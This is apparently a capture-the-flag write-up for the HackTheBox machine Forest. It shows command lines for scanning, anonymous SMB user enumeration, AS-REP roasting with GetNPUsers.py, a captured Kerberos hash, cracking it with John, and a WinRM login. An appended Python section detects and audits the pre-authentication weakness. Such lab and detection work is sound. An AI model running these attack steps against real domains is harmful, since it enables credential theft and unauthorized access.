Let’s get started!

Level: medium

Reconnaissance

This is the initial step: scanning for the open services on the machine.

COMMAND: nmap -sC -sV -oN forest 10.10.10.161

Masscan

COMMAND: masscan -e tun0 -p1-65535,U:1-65535 10.10.10.161 --rate=100

SMB Enumeration


Let's see if we can enumerate the list of users using rpcclient.

COMMAND: rpcclient -U "" -N 10.10.10.161

AS-REP Roasting


AS-REP Roasting is an attack against Kerberos for user accounts that do not require
preauthentication. This is explained in pretty thorough detail in Harmj0y's post:
https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

Performing AS-REP Roasting with GetNPUsers

COMMAND: GetNPUsers.py htb/ -usersfile users -format john -dc-ip 10.10.10.161

Before running it, we need to save all the usernames in a file called users.

We got a hash value. Let's crack it.

e68279fd754fbb9fcf0869aaa4492ae1$edc5c3558d4531eefcae1023e9794037663d8f76a058734836e6f4712ee768b6042d2ea1adb0e8e09993c6e551381e0518cb2dd96b9cd35ec33fc82ca9cadb36697cb316bb734bf2a12cf0e95a96feb46929cd66cea7e2ec4beb0ac2ec20712211c88aee81175888748d36d752b1b9e2e193fc8c229a56e151ad1d54625c8ad22751ed42b93301e04216d60fee7ff9c7805fded5a0bc24b0de5808cbd55dc5401d17ad6cea09b1f7cc4a7d79f1229f8103c757788d5e630b6a448615b6df64aa794404f78bb20acb9ba2e105f6ed1ba1989a488ae6a48b61dce4ef00ea7cfc4e

Cracking the Hash

As you can see, we could grab the John the Ripper compatible hash and crack it with John.

COMMAND: john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Earlier during our enumeration, we noticed that port 5985 is open, so we can use WinRM to
connect to the box. I used Evil-WinRM, and I also used Get-DomainUser -UACFilter
DONT_REQ_PREAUTH (PowerView.ps1) to verify which users do not need pre-authentication.
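As an added defender-side example (not part of the original writeup, and not PowerView or Impacket code), the same pre-authentication exemption viewed from two sides: the userAccountControl bit that Get-DomainUser -UACFilter DONT_REQ_PREAUTH matches, which an admin can audit in a directory export and clear, and the Security event 4768 pattern (no pre-auth, RC4 ticket, success) that a GetNPUsers-style request leaves on the domain controller. All account names, addresses and event records below are constructed.

```python
from typing import Dict, List

# userAccountControl bit that exempts an account from Kerberos pre-authentication;
# this is the flag PowerView's -UACFilter DONT_REQ_PREAUTH matches (decimal 4194304).
UF_DONT_REQUIRE_PREAUTH = 0x400000
RC4_HMAC = 0x17  # 4768 TicketEncryptionType for RC4, the type roasting tools request

def preauth_not_required(user_account_control: int) -> bool:
    """True when the account can obtain a TGT without pre-authentication."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)

def audit_preauth(users: Dict[str, int]) -> List[str]:
    """Accounts in a userAccountControl export that carry the flag and need review."""
    return sorted(name for name, uac in users.items() if preauth_not_required(uac))

def find_asrep_roast_events(events: List[dict]) -> List[dict]:
    """Successful 4768 (TGT requested) events with no pre-auth and an RC4 ticket."""
    # This combination means the KDC handed out an AS-REP for a pre-auth-exempt
    # account, which is exactly the material an offline crack of that reply needs.
    return [
        ev for ev in events
        if ev.get("EventID") == 4768
        and ev.get("PreAuthType") == 0
        and ev.get("TicketEncryptionType") == RC4_HMAC
        and ev.get("Status") == 0
    ]

def roast_sources(events: List[dict]) -> Dict[str, List[str]]:
    """Group flagged events by requesting IP so one host roasting many accounts stands out."""
    by_ip: Dict[str, List[str]] = {}
    for ev in find_asrep_roast_events(events):
        by_ip.setdefault(ev["IpAddress"], []).append(ev["TargetUserName"])
    return by_ip

# Constructed sample data (hypothetical names and addresses, not from the box).
SAMPLE_USERS = {
    "svc-backup": 0x410200,  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQUIRE_PREAUTH
    "alice": 0x10200,        # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "bob": 0x200,            # NORMAL_ACCOUNT
}
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-backup", "IpAddress": "192.0.2.10",
     "PreAuthType": 0, "TicketEncryptionType": 0x17, "Status": 0x0},
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "198.51.100.7",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "Status": 0x0},  # normal AES logon
    {"EventID": 4768, "TargetUserName": "bob", "IpAddress": "192.0.2.10",
     "PreAuthType": 0, "TicketEncryptionType": 0xFFFFFFFF, "Status": 0x19},  # refused
]
```

Clearing the flag on accounts that audit_preauth reports removes the condition the attack needs; the 4768 filter is what to alert on until that is done.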
